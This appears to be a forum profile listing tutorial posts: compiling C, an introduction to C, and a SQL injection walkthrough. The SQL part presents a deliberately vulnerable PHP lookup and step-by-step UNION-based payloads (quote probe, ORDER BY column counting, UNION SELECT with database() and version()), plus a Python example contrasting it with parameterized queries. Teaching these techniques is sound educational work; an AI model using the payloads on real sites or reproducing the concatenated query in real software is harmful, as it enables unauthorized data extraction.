A lot of people don't know about this.
Posts made by Thilan Danushka
-
RE: Do Sri Lankan developers need to change?
-
RE: SQL Injection Explained
All the other threads are in English, bro. That's why I posted it this way :-)
-
Compiling C programming
In the previous tutorial we got a quick idea of the C language. Today we are going to learn what compiling a program means and why it is needed.
As the first step, let's see what a computer program is and how it makes the computer do what we need. You know that computers only work with binary. Take this example. If we want to print "hello" to the screen we can write a program like this.
#include <stdio.h>
int main(){
    printf("hello\n");
    return 0;
}
But the computer can't understand this language. This is where the compiler comes into play. The compiler transforms C code into machine instructions. Machine code is a set of simple instructions.
The CPU can process simple instructions like mov eax, esp / pop ebp / push esp quickly.
If there is an instruction such as mov eax, 0x00, the CPU will move zero into the eax register. Likewise, if we say push esp, the CPU will take the value of esp and push it onto the top of the stack.
But even instructions like mov eax, 0x00 are not actual machine language. This is something called assembly language. So how does the CPU understand assembly?
There is a unique number for every assembly command. We call these hex numbers opcodes (operation codes). Suppose the opcode for moving something into eax is 5f; then the opcode for mov eax, 0x00 is 5f 00. After converting these hex values to binary it will be something like '0000011000100100000011'. Now the CPU can understand what it says and quickly execute that instruction. To cut a long story short, what happens here is that our C instructions are transformed into CPU-readable machine language. That's the job done by the compiler. Now we have a clear idea about the compiler; next let's see how we can compile C programs.
Compiling on a Linux machine
If you are compiling a program on a Unix/Linux system, no additional software is needed. There is an awesome compiler called GCC for this.
You can easily open a shell and type
gcc -o [executable_name] [program_name.c]
GCC does the rest for you.
Now you can run it by entering ./executable_name.
If you don't specify a name for the executable file, the default name will be a.out.
Compiling on a Windows machine
Sometimes you may need to write C code in a Windows environment. For example, if you are learning Win32 exploit development you will want to write your own vulnerable programs for practice. So let's see how you can compile on Windows. For this purpose you can use a compiler like Dev-C++. Dev-C++ is a nice tool for compiling and debugging programs.
Now we can run the exe file.
Also you want an editor for writing code. You can use Sublime, nano, gedit or whatever you like. Personally I love Sublime for coding.
OK guys, that's all for this tutorial. Thank you for reading. Don't forget to share it (sharing is caring 🙂).
C you again in the next post.
If you loved my tutorial. Share it o -
Introduction to C language
C. Yes, the classic C language is the mother of many programming languages like C++ and C#. Do you know that the interpreter of our lovely language, Python, is written in C? In 1972, C was developed by Dennis Ritchie for UNIX. In the early days C was used as the core language of the UNIX operating system. Now many other operating systems use it as their core language, and C is one of the most widely used programming languages.
Why learn C?
1) Learn exploit development
If you plan to learn exploit writing for Windows or Linux, there are no excuses: you must learn C to understand those concepts. You also need to learn how to compile C programs and how to debug them in a debugger.
2) Learn reverse engineering or malware analysis.
You need C for both of the above because C is great for learning the basics of computer architecture.
3) Manage memory directly.
C lets you work with memory directly, unlike many other languages. You can use the heap via functions like malloc(). There are also various options like structs, pointers and arrays for accessing memory. There are a bunch of other reasons to learn C and I'm not going to write all of them here.
The concept of functions
If I say C is built on a concept called the function, I'm not wrong. Every little C program uses functions. It may be two, three or more, but there is always at least one. So first of all let's understand what a function is. Think about this real-life example. There is a group of people trained to do a job. If we supply raw data, the group will process that data and give us the result. We may supply different kinds of data and the output will be different too, but the process is the same. The only thing that group of people does is run a pre-configured flow over the data. This is what happens inside a function.
Now you have a clear idea about functions. Let's see what a C program looks like.
#include <stdio.h>
int main(){
    printf("welcome to hacksland\n");
    return 0;
}
Oh, too many lines of code. 😮 In our Python printing tutorial it took only one line to do the same as above.
print("welcome to hacksland")
You may think: why are this many lines of code required for a simple hello world program? Well, you will realize this at the end of the tutorial.
Anyway, we are going to analyze the C code above and see what it actually does. First, focus only on the 3rd line of code. You can see a format like this.
printf("welcome to hacksland\n");
What does it mean? It is a function. If we give a string to this function, it will print it to the screen. In the example above we gave "welcome to hacksland", so it will print that data. What about \n? That's called a string terminator and we'll talk more about that later.
There is another thing to notice. Did you see the semicolon after the printf statement? That's how we indicate the end of a line in the C language.
Now it's time to look at the other parts of our code. In the first line we can see a #include <stdio.h> statement. What does it do? We used a function called printf in our code. But how does the computer know what to do when we give a string to the function? We give it a set of instructions to run when the function is called, and the computer processes those instructions and gives the result. In the example above, the stdio.h file is holding those instructions for the printf function. That's why we included it before using printf. On Linux these header files are located in /usr/include. If we look inside a header file we can see that the printf function looks like the following.
int printf(const char *format, ...){
    /* here is the code that prints the string supplied to the function. */
    return 0;
}
There are a couple of things to see.
At the beginning of the function you can see the keyword int. Also there is a return 0 at the end. First we tell the computer that after completing the function it will give back an integer. Then, using return 0, we give that value (here it is 0). A value of zero means the function completed successfully. In our example there was something like int main(). Do you believe me if I say that's also a function? 🙂
Yes buddy. In this tutorial I said that there is at least one function in every C program. That's the main function. Now you can understand why there is an int main() and a return 0. Yes, you guessed it: the main function also returns the value zero after completing. OK guys, we got a clear idea of what C is and what we can use it for, and we understood the basics of the C language. In the next tutorials we are going to go into deeper concepts of this awesome language. If you have any problems leave a comment. Thank you for reading.
C you again. 🙂
-
SQL Injection Explained
Hello all,
I hope you know how to do a SQL injection and have used it. In this tutorial we are going to see how it works: what's going on under the hood, and how the web application handles our input and processes the SQL query. Let's see.
Imagine that there is a web application like this.
Front-End Web Application
Here we see how the web application takes input from the user and sends that data to the PHP script through a GET request.
<html>
<head>
<title>SQL Injection Tutorial - HacksLand</title>
</head>
<body>
<h1><center>HacksLand - Ethical Hacking Tutorials</center></h1>
<form method="GET" action="index.php">
<h2><center>Give the ID for fetch details</center></h2><br>
<input align="center" type="text" name="id">
</form>
</body>
</html>
Back-end PHP Script
Now there should be a back-end script that handles this submitted data and builds a SQL query.
After the SQL query returns some data from the database, the PHP script processes that data and gives the user output.
Assume that the following is the PHP code.
<?php
include("sql_connect.php");
if(isset($_GET['id'])) {
    $id=$_GET['id'];
    // The raw GET value is spliced straight into the query text: this is the injection point.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysqli_query($con, $sql);
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    if($row) {
        echo 'Name for ID: '. $row['name'];
        echo "<br>";
        echo 'Age for ID: ' .$row['age'];
    } else {
        // Echoing the driver error to the page is what makes the single-quote probe below visible.
        print_r(mysqli_error($con));
    }
} else {
    echo "Please input the ID";
}
?>
I hope you can understand what is going on here.
For this example we need a table that the SQL query takes data from.
So all OK and fine.
SQL Query
Now let's see how this is happening.
Imagine that I enter 3 as the input. So our ID will be equal to 3. What about our SQL query?
$sql="SELECT * FROM users WHERE id='3' LIMIT 0,1";
So it will give us the output.
Name for ID: Clara
Age for ID : 18
Nice! It looks like the web application is working fine.
Do you remember that in our previous tutorial we used a single quote to break a SQL query?
What if I enter 3' as the input?
It gives me an error.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3'' LIMIT 0,1' at line 1
What the fuck goes on here?
$sql="SELECT * FROM users WHERE id='3'' LIMIT 0,1";
You can clearly see that there is a syntax error near id='3''. Previously I explained why this happens.
Injecting the SQL Query
Now we have to see how we can fix this error and extract data from the database. What if I enter the following payload?
3' --+
Now our query is.
$sql="SELECT * FROM users WHERE id='3' --+' LIMIT 0,1";
But actually we only care about the code before --+, because -- is the comment marker in SQL and everything after it is ignored. (MySQL requires whitespace after --, and the + becomes a space when the URL is decoded, which is why the payload is written --+.) So now this code is valid and it'll give us the output as expected.
This is the time to fetch data from the database. But how?
Can we use another SELECT command with this one?
Yes indeed, we can combine two SELECT commands with the UNION operator like this.
SELECT Name,Age FROM users UNION SELECT Subject,ID FROM users
But one thing: both SELECT queries must use the same number of columns. It doesn't matter that they use different columns, only the number of columns must be the same.
You may say that it's simple, there are 5 columns in the table. No buddy, in real life you can't see the table and you can't tell how many columns there are. 🙁
We can use a trick to find the number of columns used by the first SELECT command.
Think about our table and the following commands.
SELECT * FROM users ORDER BY Name
SELECT * FROM users ORDER BY 3
The first command says select all columns from the users table and order the results according to the Name column. The second command says the same, but the results should be ordered by the 3rd column (Age).
So even if we don't know the column names we can order by 1, 2, 3 etc. OK.
Now I enter this as the ID.
3' order by 1--+
Let's see our query.
$sql="SELECT * FROM users WHERE id= '3' order by 1--+' LIMIT 0,1";
This gives us the output as expected because there is more than 1 column, so it's possible to order the result by the first column.
Next we try order by 2. This will also be fine. The web application will work normally until we reach order by 5.
What if we enter order by 6?
Surely it'll give an error because there are not 6 columns. So by using this method we can find how many columns the first SELECT command uses. Now we can add another SELECT command.
SELECT * FROM users WHERE id= '3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
What is going on here is that the SQL query thinks there is another table like the following and tries to fetch data from both of them. Then that data is printed to the screen by the PHP code.
Now if we can print data from the second table we can find which columns the web application uses to show data (in this example we know that the PHP script gets the Name and Age columns). But unfortunately we still see only the following output. 🙁
Name for ID: Clara
Age for ID : 18
Why is that? Because when our SQL query sees there are two tables, it first fetches data from the first table. So if we want to get data from the second one we must make the first SELECT command return nothing (a null result). Our final payload:
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,2,3,4,5 --+ ' LIMIT 0,1
Since -3 is not in the ID column, data from our second table will be printed out.
Name for ID: 2
Age for ID : 3
Finally it's a success. We can see that columns 2 and 3 are used by the web app.
Now we can use these 2 channels to get any data from the database. 🙂
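To see why the single-quote probe, the column-count probe and the final UNION payload behave as described above, and what stops them, here is an added example (not code from the original post) that replays the same inputs against a query built like the tutorial's PHP and against a parameterized version. It assumes an in-memory SQLite table with constructed rows standing in for the tutorial's MySQL users table; the behaviours shown (unterminated string error, ORDER BY out of range, UNION row replacing the real row, bound parameter never parsed as SQL) are the same on MySQL.

```python
import sqlite3

# Constructed sample table standing in for the tutorial's "users" table:
# five columns, so "ORDER BY 5" is valid and "ORDER BY 6" is not.
SAMPLE_ROWS = [
    (1, "Ann", 22, "Maths", "ann@example.test"),
    (3, "Clara", 18, "Physics", "clara@example.test"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, subject TEXT, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?,?,?,?,?)", SAMPLE_ROWS)
    return con


def lookup_vulnerable(con, user_id):
    """Same construction as the PHP: the raw input is pasted into the SQL text."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return con.execute(sql).fetchone()


def lookup_safe(con, user_id):
    """Hardened form: the input is sent as a bound parameter, never as SQL text,
    so a quote, a comment marker or a UNION inside it is only ever compared as a value."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return con.execute(sql, (user_id,)).fetchone()


def probe(con, lookup, user_id):
    """Return the row, or the database error text (what the PHP echoes via mysqli_error)."""
    try:
        return lookup(con, user_id)
    except sqlite3.Error as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    con = make_db()
    for payload in ["3", "3'", "3' --+", "3' ORDER BY 6 --+", "-3' UNION SELECT 1,2,3,4,5 --+"]:
        print(repr(payload), "vulnerable ->", probe(con, lookup_vulnerable, payload))
        print(repr(payload), "safe       ->", probe(con, lookup_safe, payload))
```

With the vulnerable lookup the last payload returns the row (1, 2, 3, 4, 5) instead of Clara's, which is exactly the "Name for ID: 2 / Age for ID: 3" output above; the parameterized lookup returns no row for every malformed input and never raises a syntax error.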
Extracting Basic Information
First of all let's try to find out the database name.
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,database(),3,4,5 --+ ' LIMIT 0,1
We can see the database name on the screen.
Name for ID: database_name
Age for ID : 3
SELECT * FROM users WHERE id= '-3' UNION SELECT 1,version(),3,4,5 --+ ' LIMIT 0,1
Like this you can use database(), user(), version() etc. to fetch some basic data.
In next tutorial we are going to learn how to use SQL injection to extract more data.